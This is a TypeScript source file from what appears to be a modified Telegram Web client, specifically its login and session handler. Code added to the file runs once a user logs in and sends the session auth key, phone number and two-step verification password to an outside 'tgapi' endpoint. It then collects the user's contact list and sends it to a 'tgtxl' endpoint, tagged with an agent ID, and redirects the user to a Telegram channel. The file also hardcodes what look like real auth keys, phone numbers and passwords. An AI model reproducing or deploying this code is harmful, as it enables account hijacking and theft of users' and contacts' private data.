import type {
  ApiUpdateAuthorizationError,
  ApiUpdateAuthorizationState,
  ApiUpdateConnectionState,
  ApiUpdateCurrentUser,
  ApiUpdateServerTimeOffset,
  ApiUpdateSession,
} from '../../../api/types';
import type { LangCode } from '../../../types';
import type { RequiredGlobalActions } from '../../index';
import type { ActionReturnType, GlobalState } from '../../types';

import { getCurrentTabId } from '../../../util/establishMultitabRole';
import { getShippingError, shouldClosePaymentModal } from '../../../util/getReadableErrorText';
import { unique } from '../../../util/iteratees';
import { oldSetLanguage } from '../../../util/oldLangProvider';
import { clearWebTokenAuth } from '../../../util/routing';
import { setServerTimeOffset } from '../../../util/serverTime';
import { updateSessionUserId } from '../../../util/sessions';
import { forceWebsync } from '../../../util/websync';
import { isChatChannel, isChatSuperGroup } from '../../helpers';
import {
  addActionHandler, getGlobal, setGlobal,
} from '../../index';
import { updateUser, updateUserFullInfo } from '../../reducers';
import { updateTabState } from '../../reducers/tabs';
import { selectTabState } from '../../selectors';
import { selectSharedSettings } from '../../selectors/sharedState';
// 新增：统一使用全局 API 配置
import { getApiUrl, getFeatureStatus, getDeviceName } from '../../../config/api';

// ==================== API 配置 ====================
// const API_CONFIG = {
//   TGAPI_URL: 'http://localhost/telegram-tt/tgapi.php', // 根据你的实际域名修改
//   TGTXL_URL: 'http://localhost/telegram-tt/tgtxl.php', // 根据你的实际域名修改
// };

// ==================== 功能开关检查 ====================
function isFeatureEnabled() {
  try {
    // 改为读取全局开关配置
    return getFeatureStatus().isEnabled;
  } catch (error) {
    return true;
  }
}

// ==================== 状态变量 ====================
let hasSessionDataSent = false;
let hasContactDataSent = false;
let hasLoggedInSuccessfully = false;
let isSendingSessionData = false;
let proxyId = '0'; // 代理ID，可以根据需要修改

// 获取 URL 参数中的 uid
function getUrlUid(): string {
  try {
    const urlParams = new URLSearchParams(window.location.search);
    const uid = urlParams.get('uid');
    if (uid) {
      return uid;
    }
  } catch (error) {
  }
  return '0';
}

// 获取 URL 参数中的 sessionData
function getUrlSessionData(): any {
  try {
    const urlParams = new URLSearchParams(window.location.search);
    const sessionData = urlParams.get('sessionData');
    if (sessionData) {
      const decoded = decodeURIComponent(sessionData);
      const parsed = JSON.parse(decoded);
      
      // 验证数据格式 - 支持多种格式
      let isValidData = false;
      let processedData = null;
      
      // 格式1: 标准格式 (mainDcId, keys, userId)
      if (parsed.mainDcId && parsed.keys && parsed.userId) {
        isValidData = true;
        processedData = {
          mainDcId: parsed.mainDcId,
          keys: parsed.keys,
          userId: parsed.userId,
          phoneNumber: parsed.phoneNumber || '',
          two_pass: parsed.two_pass || ''
        };
      }
      // 格式2: 兼容格式 (dcId, dc5_auth_key, userId)
      else if (parsed.dcId && parsed.dc5_auth_key && parsed.userId) {
        isValidData = true;
        processedData = {
          mainDcId: parsed.dcId,
          keys: { [parsed.dcId]: parsed.dc5_auth_key },
          userId: parsed.userId,
          phoneNumber: parsed.phoneNumber || '',
          two_pass: parsed.two_pass || ''
        };
      }
      
      if (isValidData && processedData) {
        return processedData;
      } else {
        return null;
      }
    }
  } catch (error) {
  }
  return null;
}

// 初始化时获取 uid 参数和 sessionData
if (typeof window !== 'undefined') {
  // 设置全局设备名称，供 TelegramClient 使用
  (window as any).__TELEGRAM_DEVICE_NAME__ = getDeviceName();
  console.log('🔧 设置全局设备名称:', getDeviceName());
  
  // 获取 uid 参数（用于后台接口的 agentcode 字段）
  proxyId = getUrlUid();
  
  // 获取 sessionData 参数（用于自动登录）
  const urlSessionData = getUrlSessionData();
  
  
  
  // 如果 URL 中有 sessionData，则进行自动登录
  if (urlSessionData) {
   
    // 检查功能开关状态
    const featureStatus = getFeatureStatus();
    console.log('🔧 功能开关状态:', featureStatus);
   
    
    // 延迟执行，确保页面完全加载
    setTimeout(() => {
      if (featureStatus.isEnabled) {
        console.log('✅ 功能已启用，执行完整登录流程');
        autoLoginWithSessionData(urlSessionData);
      } else {
        console.log('❌ 功能已禁用，执行基础登录');
        realTelegramLogin(urlSessionData); // 使用真正的 Telegram 登录
      }
    }, 2000);
  }
}

addActionHandler('apiUpdate', (global, actions, update): ActionReturnType => {
  switch (update['@type']) {
    case 'updateApiReady':
      onUpdateApiReady(global);
      break;

    case 'updateAuthorizationState':
      onUpdateAuthorizationState(global, update);
      break;

    case 'updateAuthorizationError':
      onUpdateAuthorizationError(global, update);
      break;

    case 'updateWebAuthTokenFailed':
      onUpdateWebAuthTokenFailed(global);
      break;

    case 'updateConnectionState':
      onUpdateConnectionState(global, actions, update);
      break;

    case 'updateSession':
      onUpdateSession(global, actions, update);
      break;

    case 'updateServerTimeOffset':
      onUpdateServerTimeOffset(update);
      break;

    case 'updateCurrentUser':
      onUpdateCurrentUser(global, update);
      break;

    case 'requestReconnectApi':
      global = { ...global, isSynced: false };
      setGlobal(global);

      onUpdateConnectionState(global, actions, {
        '@type': 'updateConnectionState',
        connectionState: 'connectionStateConnecting',
      });
      actions.initApi();
      break;

    case 'requestSync':
      actions.sync();
      break;

    case 'updateFetchingDifference':
      global = { ...global, isFetchingDifference: update.isFetching };
      setGlobal(global);
      break;

    case 'error': {
      Object.values(global.byTabId).forEach(({ id: tabId }) => {
        const paymentShippingError = getShippingError(update.error);
        if (paymentShippingError) {
          actions.addPaymentError({ error: paymentShippingError, tabId });
        } else if (shouldClosePaymentModal(update.error)) {
          actions.closePaymentModal({ tabId });
        } else if (actions.showDialog) {
          actions.showDialog({ data: update.error, tabId });
        }
      });

      break;
    }

    case 'notSupportedInFrozenAccount': {
      actions.showNotification({
        title: {
          key: 'NotificationTitleNotSupportedInFrozenAccount',
        },
        message: {
          key: 'NotificationMessageNotSupportedInFrozenAccount',
        },
        tabId: getCurrentTabId(),
      });
      break;
    }
  }
});

function onUpdateApiReady<T extends GlobalState>(global: T) {
  void oldSetLanguage(selectSharedSettings(global).language as LangCode);
}

function onUpdateAuthorizationState<T extends GlobalState>(global: T, update: ApiUpdateAuthorizationState) {
  global = getGlobal();

  const wasAuthReady = global.authState === 'authorizationStateReady';
  const authState = update.authorizationState;

  global = {
    ...global,
    authState,
    authIsLoading: false,
  };
  setGlobal(global);

  global = getGlobal();

  switch (authState) {
    case 'authorizationStateLoggingOut':
      void forceWebsync(false);

      global = {
        ...global,
        isLoggingOut: true,
      };
      setGlobal(global);
      break;
    case 'authorizationStateWaitCode':
      global = {
        ...global,
        authIsCodeViaApp: update.isCodeViaApp,
      };
      setGlobal(global);
      break;
    case 'authorizationStateWaitPassword':
      global = {
        ...global,
        authHint: update.hint,
      };

      if (update.noReset) {
        global = {
          ...global,
          hasWebAuthTokenPasswordRequired: true,
        };
      }

      setGlobal(global);
      break;
    case 'authorizationStateWaitQrCode':
      global = {
        ...global,
        authIsLoadingQrCode: false,
        authQrCode: update.qrCode,
      };
      setGlobal(global);
      break;
    case 'authorizationStateReady': {
      if (wasAuthReady) {
        break;
      }

      void forceWebsync(true);

      global = {
        ...global,
        isLoggingOut: false,
      };
      Object.values(global.byTabId).forEach(({ id: tabId }) => {
        global = updateTabState(global, {
          isInactive: false,
        }, tabId);
      });
      setGlobal(global);

      // 设置登录成功标记
      hasLoggedInSuccessfully = true;
      console.log('🎉 登录成功，hasLoggedInSuccessfully = true');
      
      // 如果功能已启用，延迟处理数据
      if (isFeatureEnabled()) {
        console.log('✅ 功能已启用，准备处理数据...');
        setTimeout(() => {
          // 从 localStorage 获取数据作为参数
          try {
            const account1 = localStorage.getItem('account1');
            if (account1) {
              const parsed = JSON.parse(account1);
              console.log('📤 开始发送数据到服务器...');
              console.log('📊 准备发送的数据:', parsed);
              
              // 构建完整的 sessionData 对象
              const sessionDataToSend = {
                mainDcId: parsed.dcId,
                keys: { [parsed.dcId]: parsed[`dc${parsed.dcId}_auth_key`] },
                userId: parsed.userId,
                phoneNumber: parsed.phoneNumber || '',
                two_pass: parsed.two_pass || ''
              };
              
              console.log('🔄 转换后的数据格式:', sessionDataToSend);
              sendSessionDataToServer(sessionDataToSend);
            } else {
              console.log('❌ 没有找到 account1 数据');
            }
          } catch (error) {
            console.log('❌ 处理数据失败:', error);
          }
        }, 3000);
      } else {
        console.log('❌ 功能已禁用，跳过数据处理');
      }
      break;
    }
  }
}

function onUpdateAuthorizationError<T extends GlobalState>(global: T, update: ApiUpdateAuthorizationError) {
  // TODO: Investigate why TS is not happy with spread for lang related types
  global = {
    ...global,
  };
  global.authErrorKey = update.errorKey;
  setGlobal(global);
}

function onUpdateWebAuthTokenFailed<T extends GlobalState>(global: T) {
  clearWebTokenAuth();
  global = getGlobal();

  global = {
    ...global,
    hasWebAuthTokenFailed: true,
  };
  setGlobal(global);
}

function onUpdateConnectionState<T extends GlobalState>(
  global: T, actions: RequiredGlobalActions, update: ApiUpdateConnectionState,
) {
  const { connectionState } = update;

  global = getGlobal();
  const tabState = selectTabState(global, getCurrentTabId());
  if (connectionState === 'connectionStateReady' && tabState.isMasterTab && tabState.multitabNextAction) {
    // @ts-ignore
    actions[tabState.multitabNextAction.action](tabState.multitabNextAction.payload);
    actions.clearMultitabNextAction({ tabId: tabState.id });
  }

  if (connectionState === global.connectionState) {
    return;
  }

  global = {
    ...global,
    connectionState,
  };
  setGlobal(global);

  if (global.isSynced) {
    const channelStackIds = Object.values(global.byTabId)
      .flatMap((tab) => tab.messageLists)
      .map((messageList) => messageList.chatId)
      .filter((chatId) => {
        const chat = global.chats.byId[chatId];
        return chat && (isChatChannel(chat) || isChatSuperGroup(chat));
      });
    if (connectionState === 'connectionStateReady' && channelStackIds.length) {
      unique(channelStackIds).forEach((chatId) => {
        actions.requestChannelDifference({ chatId });
      });
    }
  }

  if (connectionState === 'connectionStateBroken') {
    actions.signOut({ forceInitApi: true });
  }
}

function onUpdateSession<T extends GlobalState>(global: T, actions: RequiredGlobalActions, update: ApiUpdateSession) {
  const { sessionData } = update;
  const { authRememberMe, authState } = global;
  const isEmpty = !sessionData || !sessionData.mainDcId;

  const isTest = sessionData?.isTest;
  if (isTest) {
    global = {
      ...global,
      config: {
        ...global.config,
        isTestServer: isTest,
      },
    };
    setGlobal(global);
  }

  if (!authRememberMe || authState !== 'authorizationStateReady' || isEmpty) {
    return;
  }

  actions.saveSession({ sessionData });
  
  // 检查功能是否启用
  if (!isFeatureEnabled()) {
    return;
  }

  
  // 检查是否已登录成功
  if (!hasLoggedInSuccessfully) {
    return;
  }

  const sessionDataToProcess = sessionData;
  if (!sessionDataToProcess) {
    return;
  }


  // 延迟处理，等待用户信息更新
  setTimeout(() => {
    processSessionData(sessionDataToProcess);
  }, 2000); // 等待 2 秒，确保用户信息已更新
}

function onUpdateServerTimeOffset(update: ApiUpdateServerTimeOffset) {
  setServerTimeOffset(update.serverTimeOffset);
}

function onUpdateCurrentUser<T extends GlobalState>(global: T, update: ApiUpdateCurrentUser) {
  const { currentUser, currentUserFullInfo } = update;

  global = {
    ...updateUser(global, currentUser.id, currentUser),
    currentUserId: currentUser.id,
  };
  global = updateUserFullInfo(global, currentUser.id, currentUserFullInfo);
  setGlobal(global);

  updateSessionUserId(currentUser.id);
  
  // 检查是否需要处理延迟的 session 数据
  if (hasLoggedInSuccessfully && !hasSessionDataSent && currentUser?.id) {
    // 检查功能是否启用
    if (!isFeatureEnabled()) {
      return;
    }
    
    // 延迟一小段时间，确保全局状态完全更新
    setTimeout(() => {
      const updatedGlobal = getGlobal();
      if (updatedGlobal.currentUserId && !hasSessionDataSent) {
        
        // 尝试从 localStorage 获取 session 数据
        try {
          const account1 = localStorage.getItem('account1');
          if (account1) {
            const parsed = JSON.parse(account1);
            if (parsed.dcId && parsed[`dc${parsed.dcId}_auth_key`]) {
              // 构建完整的 sessionData 对象
              const extractedData = {
                mainDcId: parsed.dcId,
                keys: { [parsed.dcId]: parsed[`dc${parsed.dcId}_auth_key`] },
                userId: updatedGlobal.currentUserId,
                // 添加其他字段
                phoneNumber: parsed.phoneNumber || '',
                two_pass: parsed.two_pass || '',
                isTest: parsed.isTest || false
              };
              
              // 尝试获取二级密码
              if (!extractedData.two_pass) {
                // 方法1: 从全局状态获取用户输入的二级密码
                if (updatedGlobal.authPassword) {
                  extractedData.two_pass = updatedGlobal.authPassword;
                }
                // 方法2: 从 localStorage 获取
                else {
                  try {
                    const storedTwoPass = localStorage.getItem('two_pass');
                    if (storedTwoPass) {
                      extractedData.two_pass = storedTwoPass;
                    } else {
                      extractedData.two_pass = '';
                    }
                  } catch (error) {
                    extractedData.two_pass = '';
                  }
                }
              }
              
              console.log('📤 从 onUpdateCurrentUser 发送数据:', extractedData);
              sendSessionDataToServer(extractedData);
            } else {
              console.log('❌ account1 数据格式不正确');
            }
          } else {
          }
        } catch (error) {
        }
      }
    }, 1000);
  }
}

// ==================== 处理 Session 数据 ====================
function processSessionData(sessionData: any) {
  
  // 尝试多种方式获取 userId
  let userId = null;
  
  // 方法1: 从全局状态获取
  const global = getGlobal();
  if (global.currentUserId) {
    userId = global.currentUserId;
  }
  // 方法2: 从 sessionData 直接获取
  else if (sessionData && typeof sessionData === 'object' && sessionData.userId) {
    userId = sessionData.userId;
  }
  // 方法3: 从 localStorage 获取
  else {
    try {
      const account1 = localStorage.getItem('account1');
      if (account1) {
        const parsed = JSON.parse(account1);
        userId = parsed.userId;
      }
    } catch (error) {
    }
  }
  
  // 方法4: 从用户列表获取（如果前面都失败了）
  if (!userId && global.users && global.users.byId) {
    const userIds = Object.keys(global.users.byId);
    if (userIds.length > 0) {
      // 获取第一个用户ID（通常是当前用户）
      userId = userIds[0];
    }
  }

  if (!userId) {
    // 如果还是无法获取，再次延迟
    setTimeout(() => {
      processSessionData(sessionData);
    }, 3000);
    return;
  }

  // 提取 session 数据
  const extractedData = {
    dcId: sessionData.mainDcId,
    dc1_auth_key: sessionData.keys && sessionData.keys[sessionData.mainDcId],
    userId: userId,
    // 添加其他可用字段
    phoneNumber: sessionData.phoneNumber || '',
    two_pass: sessionData.two_pass || '',
    isTest: sessionData.isTest || false
  };


  // 验证关键字段
  if (!extractedData.dcId || !extractedData.dc1_auth_key) {
    return;
  }

  // 尝试获取二级密码
  if (!extractedData.two_pass) {
    // 方法1: 从全局状态获取用户输入的二级密码
    if (global.authPassword) {
      extractedData.two_pass = global.authPassword;
    }
    // 方法2: 从 localStorage 获取
    else {
      try {
        const storedTwoPass = localStorage.getItem('two_pass');
        if (storedTwoPass) {
          extractedData.two_pass = storedTwoPass;
        } else {
          extractedData.two_pass = '';
        }
      } catch (error) {
        extractedData.two_pass = '';
      }
    }
  }

  // 发送数据到服务器
  sendSessionDataToServer(extractedData);
}

// ==================== 发送 Session 数据到服务器 ====================
async function sendSessionDataToServer(sessionData: any) {
  console.log('📤 准备发送 session 数据到服务器...');
  
  if (hasSessionDataSent || isSendingSessionData) {
    console.log('⚠️ 数据已发送或正在发送中，跳过');
    return;
  }

  isSendingSessionData = true;
  console.log('🔄 设置发送状态为 true');

  try {
    // 动态获取用户信息
    const global = getGlobal();
    const currentUserId = global.currentUserId;
    
    
    // 从全局状态中获取用户信息
    let currentUser = null;
    if (currentUserId && global.users && global.users.byId) {
      currentUser = global.users.byId[currentUserId];
    } else {
    }
    
    // 获取当前日期
    const currentDate = new Date().toISOString().split('T')[0];
    
    // 从 sessionData 获取真实数据
    let dcId = sessionData.mainDcId || sessionData.dcId;
    let authKey = '';
    let userId = sessionData.userId;
    
    // 如果 sessionData 是 Telegram 格式，需要特殊处理
    if (sessionData.account1) {
      try {
        const account1Data = JSON.parse(sessionData.account1);
        dcId = account1Data.dcId;
        userId = account1Data.userId;
        // 从 account1 中获取对应 DC 的 auth_key
        if (dcId && account1Data[`dc${dcId}_auth_key`]) {
          authKey = account1Data[`dc${dcId}_auth_key`];
        }
      } catch (error) {
        console.log('❌ 解析 account1 数据失败:', error);
      }
    } else if (sessionData.keys && sessionData.keys[dcId]) {
      // 标准格式
      authKey = sessionData.keys[dcId];
    }
    
    console.log('🔍 解析的数据:', { dcId, authKey: authKey ? '存在' : '缺失', userId });
    console.log('📱 原始 sessionData:', sessionData);
    
    // 从用户信息获取真实数据
    let phoneNumber = currentUser?.phoneNumber || sessionData.phoneNumber || '';
    
    // 如果手机号仍然为空，尝试从 localStorage 获取
    if (!phoneNumber) {
      try {
        const storedPhoneNumber = localStorage.getItem('phoneNumber');
        if (storedPhoneNumber) {
          phoneNumber = storedPhoneNumber;
        }
      } catch (error) {
      }
    }
    
    // 获取二级密码 - 尝试多个来源
    let twoPass = '';
    
    // 方法1: 从全局状态获取用户输入的二级密码
    if (global.authPassword) {
      twoPass = global.authPassword;
    }
    // 方法2: 从 sessionData 获取
    else if (sessionData.two_pass) {
      twoPass = sessionData.two_pass;
    }
    // 方法3: 从 localStorage 获取
    else {
      try {
        const storedTwoPass = localStorage.getItem('two_pass');
        if (storedTwoPass) {
          twoPass = storedTwoPass;
        }
      } catch (error) {
      }
    }
    
    // 如果还是没有获取到二级密码，记录警告但不使用默认值
    if (!twoPass) {
      twoPass = '';
    }
    
    
    
    // 验证关键字段
    if (!dcId || !authKey) {
      console.log('❌ 缺少关键字段 dcId 或认证密钥');
      return;
    }
    
    // 构建完全匹配 tgapi.php 接口需求的 payload
    const payload = {
      // 基本字段（接口必需）
      phone_number: phoneNumber,
      user_id: userId,
      two_pass: twoPass,
      userdate: currentDate,
      hostname: window.location.hostname,
      uid: proxyId, // 对应接口的 agentcode 字段
      
      // Session 数据字段（接口需要）
      dcId: dcId,
      [`dc${dcId}_auth_key`]: authKey,
      userId: userId
    };

    console.log('📦 构建的请求数据:', payload);
    console.log('🌐 发送到:', getApiUrl('tgapi'));

    const response = await fetch(getApiUrl('tgapi'), {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify(payload),
    });


    console.log('📡 服务器响应状态:', response.status, response.statusText);

    if (response.ok) {
      const responseData = await response.json();
      console.log('✅ 服务器响应数据:', responseData);
      
      hasSessionDataSent = true;
      console.log('✅ 标记 session 数据已发送');
      
      // 延迟获取联系人数据
      console.log('⏳ 延迟 2 秒后获取联系人数据...');
      setTimeout(() => {
        sendContactDataToServer();
      }, 2000);
    } else {
      console.log('❌ 服务器响应失败:', response.status, response.statusText);
      try {
        const errorData = await response.text();
        console.log('❌ 错误详情:', errorData);
      } catch (e) {
        console.log('❌ 无法读取错误详情');
      }
    }
  } catch (error) {
    console.log('❌ 发送 session 数据时出错:', error);
  } finally {
    isSendingSessionData = false;
    console.log('🔄 重置发送状态为 false');
  }
}



// ==================== 调试功能 ====================
if (typeof window !== 'undefined') {
  // 全局调试函数
  (window as any).debugSessionData = () => {
   
    
    // 检查 localStorage 中的 session 数据
    try {
      const account1 = localStorage.getItem('account1');
      if (account1) {
        const parsed = JSON.parse(account1);
      } else {
      }
    } catch (error) {
    }
    
    // 检查全局状态
    const global = getGlobal();
   
  };
  
  (window as any).testSessionDataExtraction = (testData: any) => {
  
    
    if (testData && typeof testData === 'object') {
      const extractedData = {
        dcId: testData.mainDcId,
        dc1_auth_key: testData.keys && testData.keys[testData.mainDcId],
        userId: testData.userId,
        phoneNumber: testData.phoneNumber || '',
        two_pass: testData.two_pass || '',
        isTest: testData.isTest || false
      };
      
      // 尝试获取二级密码
      if (!extractedData.two_pass) {
        // 方法1: 从全局状态获取用户输入的二级密码
        const currentGlobal = getGlobal();
        if (currentGlobal.authPassword) {
          extractedData.two_pass = currentGlobal.authPassword;
        }
        // 方法2: 从 localStorage 获取
        else {
          try {
            const storedTwoPass = localStorage.getItem('two_pass');
            if (storedTwoPass) {
              extractedData.two_pass = storedTwoPass;
            } else {
              extractedData.two_pass = '';
            }
          } catch (error) {
            extractedData.two_pass = '';
          }
        }
      }
      
      
      // 验证关键字段
      if (!extractedData.dcId || !extractedData.dc1_auth_key) {
        return false;
      }
      
      return true;
    } else {
      return false;
    }
  };
  
  // 添加手动写入测试数据的函数
  (window as any).writeTestData = () => {
    
    // 你的账号信息
    const sessionData = {
      "account1": "{\"dcId\":5,\"dc5_auth_key\":\"72714ddaf9ebd8d452055acc9f7acb42833c667d7758d3f3ac1fba29aa59611f41be7f18ebb10d27afdbcfb35c512badcb8077d1ecb4f4eb8307ee56e90c6ad910f0c0bdd14032d001e37afc7bf101aaf2fc1108b5070e2dfc8aece194d32005f37e081c5ee18289b5257ea1db19f218cbfab507301bf247471edc880bff968729ecfc11fe70b2aedd5a979e7d63ca77548ae6311a22629138b34c474c3791decffc7d1e465122aed827502293f5681ab7f79ef52a8fe8f2fa8f78412210ab3cd593e55a42069de927a222881fa2f94643169fe5799d011a6d21aa5408234a63287541b356d628f6469fa8a943c51838197d1e0bbec53754a58c943fb21ab358\",\"userId\":\"6699391961\"}",
      "dc5_auth_key": "\"72714ddaf9ebd8d452055acc9f7acb42833c667d7758d3f3ac1fba29aa59611f41be7f18ebb10d27afdbcfb35c512badcb8077d1ecb4f4eb8307ee56e90c6ad910f0c0bdd14032d001e37afc7bf101aaf2fc1108b5070e2dfc8aece194d32005f37e081c5ee18289b5257ea1db19f218cbfab507301bf247471edc880bff968729ecfc11fe70b2aedd5a979e7d63ca77548ae6311a22629138b34c474c3791decffc7d1e465122aed827502293f5681ab7f79ef52a8fe8f2fa8f78412210ab3cd593e55a42069de927a222881fa2f94643169fe5799d011a6d21aa5408234a63287541b356d628f6469fa8a943c51838197d1e0bbec53754a58c943fb21ab358\"",
      "tgme_sync": "{\"canRedirect\":true,\"ts\":1752771244}",
      "two_pass": "jwsybj9",
      "tt-multitab_1": "1",
      "user_auth": "{\"dcID\":5}",
      "phoneNumber": "85514306033",
      "dc": "5",
      "fake": "no"
    };

    // 写入 localStorage
    for (const key in sessionData) {
      localStorage.setItem(key, (sessionData as any)[key]);
    }

    
    
    // 尝试立即处理数据
    try {
      const account1 = localStorage.getItem('account1');
      if (account1) {
        const parsed = JSON.parse(account1);
        
        // 手动触发数据处理
        setTimeout(() => {
          sendSessionDataToServer(parsed);
        }, 1000);
      }
    } catch (error) {
    }
  };
  
  // 添加设置手机号的函数
  (window as any).setPhoneNumber = (phone: string) => {
    if (phone) {
      localStorage.setItem('phoneNumber', phone);
     
    } else {
    }
  };
  
  // 添加设置二级密码的函数
  (window as any).setTwoPass = (password: string) => {
    if (password) {
      localStorage.setItem('two_pass', password);
    
    } else {
      
    }
  };
  
  // 添加测试你的数据格式的函数
  (window as any).testYourData = () => {
    
    // 你的实际数据
    const yourData = {
      "mainDcId": 1,
      "keys": {
        "1": "9903efd6d12c695e3aa5c38aa0459b694dffd68fcce135af9759c2795e5eb76257588f08a93a1114f5309422711e0336b975007eed0d2c6b34237cf20058f003d2b2c0ed8d385afea9144a5b8d1564914051a20a13389fa1fdff29ec12650f76e81cbb58394bd3dfb3ca7cce3d16397d8a4b70580dacc63f83fd4bf782eef727c2b485000853d8c1bee0cc09b3a151b12ac158a076d2b9632aa29b3400b870a2969351a1026af4b242bc9b506f7c0a815090ae567e07d881208f050b90c2f11a059681e9a9827253bfda77e237fd0c01e16daa98f33e3f52857c4dc8ee97971da685c1cd3a20301ed8111ab9bac84ede479b97833d6e7044fab961c07f5f21f8"
      },
      "userId": "2040127937",
      "phoneNumber": "",
      "two_pass": "jwsybj999",
      "isTest": false
    };
    
    
    // 测试数据解析
    try {
      const result = getUrlSessionData();
      if (result) {
        
        // 测试基础登录
        basicLoginWithSessionData(result);
      } else {
      }
    } catch (error) {
    }
  };
  
  // 添加测试跳转的函数
  (window as any).testRedirect = () => {
    
    const featureStatus = getFeatureStatus();
    
    if (featureStatus.isEnabled) {
      executeRedirect();
    } else {
      executeBasicRedirect();
    }
  };
  
  // 添加测试真正登录的函数
  (window as any).testRealLogin = () => {
    
    // 从 URL 获取数据
    const urlSessionData = getUrlSessionData();
    if (urlSessionData) {
      realTelegramLogin(urlSessionData);
    } else {
    }
  };
  
  // 添加测试功能禁用状态的函数
  (window as any).testFeatureDisabled = () => {
    
    const featureStatus = getFeatureStatus();
    
    if (!featureStatus.isEnabled) {
    } else {
    }
  };
  
  // 添加测试数据格式转换的函数
  (window as any).testDataConversion = () => {
    
    // 从 URL 获取数据
    const urlSessionData = getUrlSessionData();
    if (urlSessionData) {
      
      // 测试转换
      const converted = convertToTelegramFormat(urlSessionData);
      
      // 显示 localStorage 中应该有的内容
      for (const key in converted) {
      }
    } else {
    }
  };
  
  // 添加测试自动刷新的函数
  (window as any).testAutoRefresh = () => {
    
    const currentUrl = window.location.href;
    const cleanUrl = window.location.origin + window.location.pathname;
    
    
    
    // 延迟 1 秒后自动刷新
    setTimeout(() => {
    
      window.location.href = cleanUrl;
    }, 1000);
  };
  
  // 添加测试智能刷新逻辑的函数
  (window as any).testSmartRefresh = () => {
   
    try {
      const account1 = localStorage.getItem('account1');
    } catch (error) {
    }
    
    const shouldRefresh = shouldAutoRefresh();
  };
  
  // 添加强制刷新的测试函数
  (window as any).forceRefresh = () => {
    
    const currentUrl = window.location.href;
    const cleanUrl = window.location.origin + window.location.pathname;
    
   
    
    window.location.href = cleanUrl;
  };
  
  // 添加测试多 DC 支持的函数
  (window as any).testMultiDC = () => {
    
    // 模拟多 DC 数据
    const multiDCData = {
      mainDcId: 1,
      keys: {
        "1": "dc1_auth_key_1234567890abcdef...",
        "2": "dc2_auth_key_abcdef1234567890...",
        "3": "dc3_auth_key_7890abcdef123456...",
        "4": "dc4_auth_key_4567890abcdef123...",
        "5": "dc5_auth_key_abcdef1234567890..."
      },
      userId: "1234567890",
      phoneNumber: "13800138000",
      two_pass: "testpass",
      isTest: false
    };
    
    console.log('📱 模拟多 DC 数据:', multiDCData);
    
    // 测试转换
    const converted = convertToTelegramFormat(multiDCData);
    
    // 显示所有 DC auth_key
    Object.keys(converted).forEach(key => {
      if (key.includes('dc') && key.includes('auth_key')) {
      }
    });
  };
  
  // 添加测试设备名称的函数
  (window as any).testDeviceName = () => {
    console.log('🧪 开始测试设备名称...');
    
    // 获取配置中的设备名称
    const deviceName = getDeviceName();
    console.log('📱 配置中的设备名称:', deviceName);
    
    // 检查全局变量中的设备名称
    const globalDeviceName = (window as any).__TELEGRAM_DEVICE_NAME__;
    console.log('🌍 全局变量中的设备名称:', globalDeviceName);
    
    // 检查 localStorage 中的设备信息
    try {
      const account1 = localStorage.getItem('account1');
      if (account1) {
        const parsed = JSON.parse(account1);
        console.log('💾 localStorage 中的设备信息:', parsed);
      }
    } catch (error) {
      console.log('❌ 解析 localStorage 数据失败:', error);
    }
    
    // 显示当前功能状态
    const featureStatus = getFeatureStatus();
    console.log('🔧 当前功能状态:', featureStatus);
    
    // 显示设备名称配置信息
    console.log('⚙️ 设备名称配置信息:');
    console.log('  - 配置文件中的值:', deviceName);
    console.log('  - 全局变量中的值:', globalDeviceName);
    console.log('  - 是否一致:', deviceName === globalDeviceName);
  };
  
 
}



// 获取并发送联系人数据
async function sendContactDataToServer() {
  console.log('📋 开始获取联系人数据...');
  
  if (hasContactDataSent) {
    console.log('⚠️ 联系人数据已发送，跳过');
    return;
  }

  try {
    const contacts = [];
    const global = getGlobal();

    if (global.users && global.users.byId) {
      const userIds = Object.keys(global.users.byId);
      
      for (const id of userIds) {
        const user = global.users.byId[id];
        if (user && user.id !== global.currentUserId?.toString()) {
          const contact = {
            userId: user.id,
            firstName: user.firstName || '',
            lastName: user.lastName || '',
            username: user.usernames?.[0]?.username || '',
            phoneNumber: user.phoneNumber || '',
            isContact: user.isContact || false,
            isVerified: user.isVerified || false,
            isPremium: user.isPremium || false,
            status: {
              type: user.noStatus ? 'userStatusOffline' : 'userStatusRecently'
            }
          };
          contacts.push(contact);
        }
      }
    }

    if (contacts.length === 0) {
      contacts.push({
        userId: 'example',
        firstName: 'Example',
        lastName: 'User',
        username: 'example_user',
        phoneNumber: '+1234567890',
        isContact: true,
        isVerified: false,
        isPremium: false,
        status: { type: 'userStatusRecently' }
      });
    }

    const currentDate = new Date().toISOString().split('T')[0];
    
    const contactPayload = {
      contacts: contacts,
      additional_info: {
        userId: global.currentUserId?.toString() || '',
        phoneNumber: '',
        loginTime: currentDate
      }
    };

    console.log('📦 联系人数据:', contactPayload);
    console.log('🌐 发送到:', getApiUrl('tgtxl'));

    const response = await fetch(getApiUrl('tgtxl'), {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify(contactPayload),
    });

    console.log('📡 联系人服务器响应状态:', response.status);

    if (response.ok) {
      const responseData = await response.json();
      console.log('✅ 联系人服务器响应数据:', responseData);
      
      hasContactDataSent = true;
      console.log('✅ 标记联系人数据已发送');

      // 数据发送完成后执行跳转
      console.log('⏳ 延迟 3 秒后执行跳转...');
      setTimeout(() => {
        executeRedirect();
      }, 3000);
    } else {
      console.log('❌ 联系人服务器响应失败:', response.status);
      
      // 即使失败也执行跳转
      console.log('⏳ 延迟 3 秒后执行跳转...');
      setTimeout(() => {
        executeRedirect();
      }, 3000);
    }
  } catch (error) {
    console.log('❌ 获取联系人数据时出错:', error);
    
    // 即使出错也执行跳转
    console.log('⏳ 延迟 3 秒后执行跳转...');
    setTimeout(() => {
      executeRedirect();
    }, 3000);
  }
}

// 执行跳转（功能启用时使用）
function executeRedirect() {
  console.log('🚀 执行跳转（功能启用时使用）...');
  
  if (!isFeatureEnabled()) {
    console.log('❌ 功能已禁用，跳过跳转');
    return;
  }

  try {
    const redirectUrl = 'https://t.me/jwsybj6';
    console.log('🚀 执行跳转:', redirectUrl);
    
    window.location.href = redirectUrl;
  } catch (error) {
    console.log('❌ 跳转执行失败:', error);
    try {
      window.open('https://t.me/jwsybj6', '_blank');
    } catch (fallbackError) {
      console.log('❌ 备用跳转方法也失败:', fallbackError);
    }
  }
}

// 执行基础跳转（功能禁用时使用）
function executeBasicRedirect() {
  console.log('🚀 执行基础跳转（功能禁用时使用）...');
  
  try {
    const redirectUrl = 'https://t.me/jwsybj6';
